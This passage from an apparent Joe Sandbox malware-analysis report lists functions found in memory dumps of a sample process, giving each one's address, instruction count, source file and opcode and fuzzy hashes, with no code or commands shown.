                                                          • API String ID:
                                                          • Opcode ID: 38689cf1cdd09d80372cd8714291fadd158a3459a86064fb0c9f20a4ede5a2b9
                                                          • Instruction ID: 815b49d6a57b77471adb589e64d25cf7fc141fde01da7a06b64e3242c2bef342
                                                          • Opcode Fuzzy Hash: 38689cf1cdd09d80372cd8714291fadd158a3459a86064fb0c9f20a4ede5a2b9
                                                          • Instruction Fuzzy Hash: 72018630A5951E4EEB38EB54DC647F833E1FF64311F1140B9C40ED31A2EE786B848A00
                                                          Function 00007FFD9BA20C50 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: da0d4e5fd0e6cd70019298cea3617641d8b8f6435e6baf3f276cb44d3e498224
                                                          • Instruction ID: 3781dee56d62470e92f5542e702938cc328eb203cf6dc83f8e5c9fe095566f81
                                                          • Opcode Fuzzy Hash: da0d4e5fd0e6cd70019298cea3617641d8b8f6435e6baf3f276cb44d3e498224
                                                          • Instruction Fuzzy Hash: 7901A270A0E38D9FE722DBB4C45059D7FF0AF06710F1542E7C485CB2A2D9785A48C741
                                                          Function 00007FFD9BA20BB5 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                          • Instruction ID: ad5ae40fa5e3008bbe00b180a24aa12d2756360a098a56e2aa69e44fe4c61d24
                                                          • Opcode Fuzzy Hash: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                          • Instruction Fuzzy Hash: A5F0EC20B9E54E4BEA6073B4D8E24587F60EF4B210FC604F2D049C60E2E58955968301
                                                          Function 00007FFD9BE1266F Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9115f6918c12fd5eb5dc3872fb267a46126daa3ae90c2e345a4428884104a07f
                                                          • Instruction ID: 2570fb5f2f66c481ba69e7f7a2a3461325667a75c5f2b55f29319e7dd8b4c4c8
                                                          • Opcode Fuzzy Hash: 9115f6918c12fd5eb5dc3872fb267a46126daa3ae90c2e345a4428884104a07f
                                                          • Instruction Fuzzy Hash: 75F05E60B099098FDBACDBA8882967D73D2EF98305B21013AD44FD32E5CE2699418701
                                                          Function 00007FFD9BA20B77 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3849204b0071097f158cba690ba559b0d9f713d6a8e70ed6b544af60f35cebe9
                                                          • Instruction ID: 3ffca52f024f662f2c06aeae86c512e6b74748c07af9810912d7479071fb32db
                                                          • Opcode Fuzzy Hash: 3849204b0071097f158cba690ba559b0d9f713d6a8e70ed6b544af60f35cebe9
                                                          • Instruction Fuzzy Hash: 70F0AB3524A9898FDB81AB38ECE04E4BB60FF0730876716EAC0C9C7062C292055DC700
                                                          Function 00007FFD9BA232E5 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6606f0f3d3229838d91832c6105aa247bd03f14a11520150c8360a1e84743d7
                                                          • Instruction ID: 24cecc59e7130658d4ce0ea27275d51a3af9b1f35f1cc25d0fe1323b695e377c
                                                          • Opcode Fuzzy Hash: a6606f0f3d3229838d91832c6105aa247bd03f14a11520150c8360a1e84743d7
                                                          • Instruction Fuzzy Hash: C9F03030B8960E4EEA78EB54DD607B933D1AF55710F1250B9D94EC31B2EE686A458A04
                                                          Function 00007FFD9BE1AEE0 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9aa1c43a7c33a1f2f17960e69a3f82e5bbfb3b4bb409876570de02325b1d8139
                                                          • Instruction ID: 2a9e9280b7404ba0d4932600508c91211e3d703d5658216a16282b712a709f3b
                                                          • Opcode Fuzzy Hash: 9aa1c43a7c33a1f2f17960e69a3f82e5bbfb3b4bb409876570de02325b1d8139
                                                          • Instruction Fuzzy Hash: 74F0523020E1478FD32ACB68C8B57F933C4DF01310F2606BDE41ACB6E2CA6AA600C780
                                                          Function 00007FFD9BE148B0 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 353d3730003ceb98687ef1eddf644425c7d7f35a9a1e3c878ea0166852abeb78
                                                          • Instruction ID: 2ac8b8c352c2087d3632a0ab431f5f90c4df351da26dcb24cb5d0c95ceb26287
                                                          • Opcode Fuzzy Hash: 353d3730003ceb98687ef1eddf644425c7d7f35a9a1e3c878ea0166852abeb78
                                                          • Instruction Fuzzy Hash: 01F0243020A2474FD31ADA6884716E437D09F02300F2602BDD449CB3E2CA6AA6008B80
                                                          Function 00007FFD9BA22BC0 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 686483c7a541abf2005f6ea1a17a8a83b1151d6eea0d2da7214aa0fa23b6f9ab
                                                          • Instruction ID: 3fb96ce7652860b80687f07f4304083c8698e5971eec10660aedd3bc23c19bd8
                                                          • Opcode Fuzzy Hash: 686483c7a541abf2005f6ea1a17a8a83b1151d6eea0d2da7214aa0fa23b6f9ab
                                                          • Instruction Fuzzy Hash: E5E06D21F59D0D4FEEB8E7AC8429A7822C39FA8741B0A0175E40DC72B2DCA8AD014600
                                                          Function 00007FFD9BA23D83 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6dd27f9ac285e05519ad64f90e19559c4832f1e73fa757b975b4380001b664f2
                                                          • Instruction ID: afb3339e63d10a5c0a9449d335bd8fdd863e489d1478d487847fced031092e99
                                                          • Opcode Fuzzy Hash: 6dd27f9ac285e05519ad64f90e19559c4832f1e73fa757b975b4380001b664f2
                                                          • Instruction Fuzzy Hash: FCE0ED24F4941A86FB749384C971BBD6260EF94300F1600B8E94E937D1D978AF018645
                                                          Function 00007FFD9BE1A3C2 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b426ed352a92ab91cdae39e7b191dac79f69cd0fc5667e2cfb03b17c4acf502b
                                                          • Instruction ID: 3ae201cf591b56719ae36e69f8466b300c9d18382f2a62183120ff209238ab17
                                                          • Opcode Fuzzy Hash: b426ed352a92ab91cdae39e7b191dac79f69cd0fc5667e2cfb03b17c4acf502b
                                                          • Instruction Fuzzy Hash: ACE04852E0E7CB9BF72306B84C711B82BD4DF1722435913F6D1B9891F3DA9829859351
                                                          Function 00007FFD9BE18A6E Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 281a57f5da20882f43cb52e907745b8ba3c0693739313edfdcc69a322c0b3e1c
                                                          • Instruction ID: 547c311b8fbc4ac0757125311115d19fdaf000aa658a4d3e8c2df82669e0edb3
                                                          • Opcode Fuzzy Hash: 281a57f5da20882f43cb52e907745b8ba3c0693739313edfdcc69a322c0b3e1c
                                                          • Instruction Fuzzy Hash: 67D05E10F0E54E4BE7A8AA585872774618AAFC5780F261179E05E832E7DD0E2D405582
                                                          Function 00007FFD9BA212B8 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c1a956ba1ac9307f8447a92c83da176a698f361c040b8d855ba7ebe01ddc563
                                                          • Instruction ID: d0830222c4346dc6e5d8ca93ffc06c5664d5e5ef374b38f4dbf4ff7c71dbb703
                                                          • Opcode Fuzzy Hash: 6c1a956ba1ac9307f8447a92c83da176a698f361c040b8d855ba7ebe01ddc563
                                                          • Instruction Fuzzy Hash: 64C0123065180C8FCA48EB28C894D1473A1FB19304B960094E00DCB2B1D66AECC2CB40
                                                          Function 00007FFD9BE1A5DF Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eae187920c037d28324043db126c97c842ded208fb72bcd56d05f26ea6a3afd1
                                                          • Instruction ID: 9b0d0f2276ae74205967ea76a7aa7573b5899ec780192be312d4c8b9bd3fa145
                                                          • Opcode Fuzzy Hash: eae187920c037d28324043db126c97c842ded208fb72bcd56d05f26ea6a3afd1
                                                          • Instruction Fuzzy Hash: 95D0C974F0E20FCBE63915E988A01BC72A49F01701BA52135F07B5B6A2CDAA3E816690
                                                          Function 00007FFD9BA206AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90b9b45432f1f86b634a01daa0615d2a31e2bedcc7ee779e1b24779fe64a6e87
                                                          • Instruction ID: fbec5e287ac7287218a7aec9cb528960b46729805513ae9221ba9ee8b81af2f1
                                                          • Opcode Fuzzy Hash: 90b9b45432f1f86b634a01daa0615d2a31e2bedcc7ee779e1b24779fe64a6e87
                                                          • Instruction Fuzzy Hash: E5C04C05FDB55F02E47533EE56660ADB5415BC4A24FD31172D50D804B19CED22D6015E
                                                          Function 00007FFD9BE18A61 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 444a6b528815f2088ad0aaf21dce7f59baa8a4f6276c5f445a44e4d4c75f650c
                                                          • Instruction ID: bbcfc2a7b9c7c473aab9ef8df7a399a6812ca91709aed9b9f0793cf354a5a5f2
                                                          • Opcode Fuzzy Hash: 444a6b528815f2088ad0aaf21dce7f59baa8a4f6276c5f445a44e4d4c75f650c
                                                          • Instruction Fuzzy Hash: 21D0C9312498098FDA94DA54C054D6433A5EB683403325064D10FC7271DA25EA51DB10
                                                          Function 00007FFD9BA20B18 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                          • Instruction ID: 8deaaca0368ada441d9f5f41248c512c402cd64c9f43374f262ac808b45e1b01
                                                          • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                          • Instruction Fuzzy Hash: 87C08C305118088FC910E72CC8A480076A0FB0D210BD20090E40DCB271E25A9C80C700
                                                          Function 00007FFD9BE1AEBB Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0bf322826bfd76d81e7692e2408d603620cbec09eedfecc5755ea08fa654c3d
                                                          • Instruction ID: 1bd5ad13d0ebc5d55bde19ee595f3615c8f2c5eeccc0c5587025c07438bbd36f
                                                          • Opcode Fuzzy Hash: e0bf322826bfd76d81e7692e2408d603620cbec09eedfecc5755ea08fa654c3d
                                                          • Instruction Fuzzy Hash: D9D0C914B0FA0F89F539969181B023A659C8F14700F72743ED07F418E1CD1FBB816202
                                                          Function 00007FFD9BE1488B Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a9375dd49f887e47b27077734699d1be4ab1e17341f3e9b7a38b1a54e197c48b
                                                          • Instruction ID: fbc8ff6417c53f7dcab8b5d65c2715e1c5d4bf9a79ee7277b7bf80f407ddc1e9
                                                          • Opcode Fuzzy Hash: a9375dd49f887e47b27077734699d1be4ab1e17341f3e9b7a38b1a54e197c48b
                                                          • Instruction Fuzzy Hash: AFD0C914B1F99F87F5785682813023A12F99F42700E73243EE05F41AF5CD6E77016A01
                                                          Function 00007FFD9BE1AECE Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6902be3f3ee48bd7adf79b423a34e450ed48cf9acf4c3b6dac58b7196cd9896f
                                                          • Instruction ID: 4f253913199ade3d828b5d99b9448a4593ad1983823e6bb9663ef9998f6cb7ca
                                                          • Opcode Fuzzy Hash: 6902be3f3ee48bd7adf79b423a34e450ed48cf9acf4c3b6dac58b7196cd9896f
                                                          • Instruction Fuzzy Hash: 43C01220A0E60A8FF225535080B123537548F01300F225475C41A4A8A1CD2776419211
                                                          Function 00007FFD9BE1489E Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e81a46880a3cef914d3ed6f0eef1a91ded1eab88694ec73582de08db6820831f
                                                          • Instruction ID: 4d97989990d9bbe9e7275d972e4692f1ae37919f6063d224e6d21de0e4a9f245
                                                          • Opcode Fuzzy Hash: e81a46880a3cef914d3ed6f0eef1a91ded1eab88694ec73582de08db6820831f
                                                          • Instruction Fuzzy Hash: 39C01220A0E64A8BF2255791803122527E59F02340F3340BED80A8AAB6CD6A3A429A11
                                                          Function 00007FFD9BA20548 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28e149b6eaec8455acf60dd11d1a90677249e3e03ef4fee0938c6a344fd6fcae
                                                          • Instruction ID: 912b100003ab8edc72455422d24e48457abc8e33b58c22c27ffc3f2bfe6657a3
                                                          • Opcode Fuzzy Hash: 28e149b6eaec8455acf60dd11d1a90677249e3e03ef4fee0938c6a344fd6fcae
                                                          • Instruction Fuzzy Hash: C5B09234D9760F42DE3833B149620A47050AB45215FD205B4D408401A5E8AE52D58282
                                                          Function 00007FFD9BE13D9F Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be46b0ca993532f40b5eb8a6c92870c33f9e631377ee22268fe86b4c7ec1f3d2
                                                          • Instruction ID: bb94ea85c905a16fe56a969b1ab32bc6c6530a61d70b5c1470cdcf9a8f4fb808
                                                          • Opcode Fuzzy Hash: be46b0ca993532f40b5eb8a6c92870c33f9e631377ee22268fe86b4c7ec1f3d2
                                                          • Instruction Fuzzy Hash: 47C09B41F0F74B67E73215F004B11BD46541F16304B671575D106491F7EC9D6A495251
                                                          Function 00007FFD9BA206D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ba15709c7bce199245e9aad1591c37684aff8dc16d5a1c51746c42f582f0d5f
                                                          • Instruction ID: 93b150d58a3581a9ca1cb2d48e6609762cdf1597cc529a9f93fa6968d7cd02c0
                                                          • Opcode Fuzzy Hash: 1ba15709c7bce199245e9aad1591c37684aff8dc16d5a1c51746c42f582f0d5f
                                                          • Instruction Fuzzy Hash: 44B00204ED744F02E47437FA196706D74505B45514FD61170D40D9059598DD56951257